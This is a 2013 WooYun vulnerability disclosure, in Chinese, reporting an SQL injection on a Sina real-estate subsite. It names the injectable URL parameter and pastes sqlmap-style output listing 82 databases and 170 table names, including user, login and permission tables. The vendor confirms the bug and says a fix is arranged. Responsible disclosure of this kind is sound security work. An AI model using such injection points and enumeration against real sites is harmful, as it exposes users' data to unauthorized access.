当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038252

漏洞标题:新浪某分站SQL注入漏洞一枚

相关厂商:新浪

漏洞作者: m1x7e1

提交时间:2013-09-26 14:17

修复时间:2013-11-10 14:17

公开时间:2013-11-10 14:17

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-26: 细节已通知厂商并且等待厂商处理中
2013-09-26: 厂商已经确认,细节仅向厂商公开
2013-10-06: 细节向核心白帽子及相关领域专家公开
2013-10-16: 细节向普通白帽子公开
2013-10-26: 细节向实习白帽子公开
2013-11-10: 细节向公众公开

简要描述:

新浪某分站SQL注入漏洞,好多库啊。

详细说明:

地址:http://sz.esf.sina.com.cn/ad?p=100

001.png


available databases [82]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] shop_admin
[*] shop_bj
[*] shop_bozhou
[*] shop_cangzhou
[*] shop_cc
[*] shop_cd
[*] shop_chaohu
[*] shop_chuzhou
[*] shop_cq
[*] shop_cs
[*] shop_cz
[*] shop_datong
[*] shop_dg
[*] shop_dl
[*] shop_fs
[*] shop_fushun
[*] shop_fz
[*] shop_gg
[*] shop_gl
[*] shop_gy
[*] shop_gz
[*] shop_haikou
[*] shop_heb
[*] shop_hf
[*] shop_hhht
[*] shop_hk
[*] shop_huangshan
[*] shop_huizhou
[*] shop_hz
[*] shop_jiangmen
[*] shop_jinzhong
[*] shop_jn
[*] shop_klmy
[*] shop_km
[*] shop_ks
[*] shop_lanzhou
[*] shop_liuzhou
[*] shop_luoyang
[*] shop_lw
[*] shop_nb
[*] shop_nc
[*] shop_nj
[*] shop_nn
[*] shop_nt
[*] shop_pzh
[*] shop_qd
[*] shop_qhd
[*] shop_quanzhou
[*] shop_sanya
[*] shop_sh
[*] shop_sjz
[*] shop_suzh
[*] shop_suzhou
[*] shop_sy
[*] shop_sz
[*] shop_tangshan
[*] shop_tj
[*] shop_tongling
[*] shop_ty
[*] shop_weifang
[*] shop_weihai
[*] shop_wh
[*] shop_wuhu
[*] shop_wx
[*] shop_xian
[*] shop_xm
[*] shop_xz
[*] shop_yangjiang
[*] shop_yangzhou
[*] shop_yichang
[*] shop_yt
[*] shop_yuncheng
[*] shop_zb
[*] shop_zhengzhou
[*] shop_zhongshan
[*] shop_zhuhai
[*] shop_zjk
[*] shop_zz
[*] test


Database: shop_admin
[170 tables]
+-------------------------------+
| ad_list                       |
| ad_name                       |
| ad_time                       |
| apply_register                |
| article_tag                   |
| assign_log                    |
| auth_package                  |
| bargain_cache                 |
| bargain_info                  |
| bargain_info_log              |
| bargain_online                |
| bargain_online_list           |
| bargain_package_list          |
| bargain_receipt               |
| buy_intention                 |
| check_log                     |
| check_log_bak                 |
| community_bargain_list        |
| community_distanceset         |
| community_distanceset_list    |
| community_repair              |
| community_source_ad           |
| community_stype               |
| community_stype_set           |
| community_stype_set_list      |
| community_tmp                 |
| community_weibo               |
| community_weibo_bj            |
| community_weibo_sh            |
| community_weibo_tj            |
| company_project_relation      |
| confirm_appointment_log       |
| count_house_avgprice          |
| credit_log                    |
| dict_districtblock            |
| dict_districtblock_merge_logs |
| es_community_baidu            |
| es_home_compare               |
| es_home_gujia                 |
| es_home_spider                |
| es_pinzhuan_delete            |
| es_pinzhuan_keyword           |
| es_pinzhuan_status            |
| feat_bargain_account          |
| feat_baseinfo                 |
| feat_bonus                    |
| feat_kpiinfo                  |
| feat_ratio_config             |
| feat_sysuser                  |
| fy_agentphone                 |
| gujia_nohouse                 |
| gujia_report                  |
| gujia_report_result           |
| gujia_user                    |
| hd_reserve_sms_log            |
| help                          |
| help_article                  |
| help_content                  |
| help_left                     |
| help_suggest                  |
| help_tag                      |
| helpsort                      |
| home_agent_relation           |
| house_active_statistics       |
| htlp                          |
| job_distribute                |
| job_log                       |
| leju_house                    |
| lost_mobile                   |
| mobile_pocketagent_bound      |
| mobile_sendmessage_log        |
| my_maintain                   |
| navigation                    |
| new_building                  |
| new_company_project           |
| new_mail_log                  |
| new_mobilecode                |
| new_order_record              |
| new_order_step                |
| new_plan                      |
| new_plan_bak                  |
| new_plan_relation             |
| new_project_list              |
| new_user_contact              |
| plan_white_list               |
| property_developer            |
| rec_house                     |
| rec_house_collection          |
| rec_project                   |
| renchou                       |
| reply                         |
| sale_done                     |
| sale_package                  |
| shop_fitmentinfo              |
| sp_agent_apply_log            |
| sp_agentphone                 |
| sp_app_list                   |
| sp_app_model                  |
| sp_app_model_list             |
| sp_app_type                   |
| sp_city                       |
| sp_dict                       |
| sp_house_import               |
| sp_keep_ex_phone              |
| sp_lime                       |
| sp_log                        |
| sp_login_log                  |
| sp_luck_list                  |
| sp_mobile_send                |
| sp_notice                     |
| sp_pay_log                    |
| sp_permission                 |
| sp_phone_log                  |
| sp_project_view               |
| sp_pwd_log                    |
| sp_role                       |
| sp_role_permission            |
| sp_service_phone              |
| sp_sys_user                   |
| sp_sys_userpermission         |
| sp_user                       |
| sp_user_attention             |
| sp_user_bj                    |
| sp_user_comment               |
| sp_user_community             |
| sp_user_community_active      |
| sp_user_community_ext         |
| sp_user_community_operate_log |
| sp_user_data                  |
| sp_user_del_log               |
| sp_user_del_pic               |
| sp_user_ext                   |
| sp_user_link                  |
| sp_user_loginlog              |
| sp_user_luck                  |
| sp_user_person                |
| sp_user_pic                   |
| sp_user_pic_data              |
| sp_user_pic_data_tmp          |
| sp_user_recover               |
| sp_user_setting               |
| sp_user_subscription          |
| sp_weixin_log                 |
| sp_weixin_user                |
| sp_yxgw                       |
| study_admin                   |
| study_reply                   |
| study_sys                     |
| study_topic                   |
| sys_log                       |
| sys_variable                  |
| text_filter                   |
| tmp_tg_baidu                  |
| tmp_user                      |
| topic                         |
| user_book                     |
| user_book_info                |
| user_relation                 |
| valuation_house_log           |
| valuation_house_report        |
| valuation_no_data             |
| ws_admin_role                 |
| ws_agent_admin_users          |
| ws_fy_cell                    |
| ws_fy_housetype               |
| ws_fy_project                 |
| ws_partner                    |
| ws_pic_housetype              |
| ws_project_list               |
| ws_sp_user                    |
+-------------------------------+

漏洞证明:

见详细说明

修复方案:

管理员会修复的。

版权声明:转载请注明来源 m1x7e1@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-09-26 14:23

厂商回复:

感谢关注新浪安全,已安排人员进行修复~

最新状态:

暂无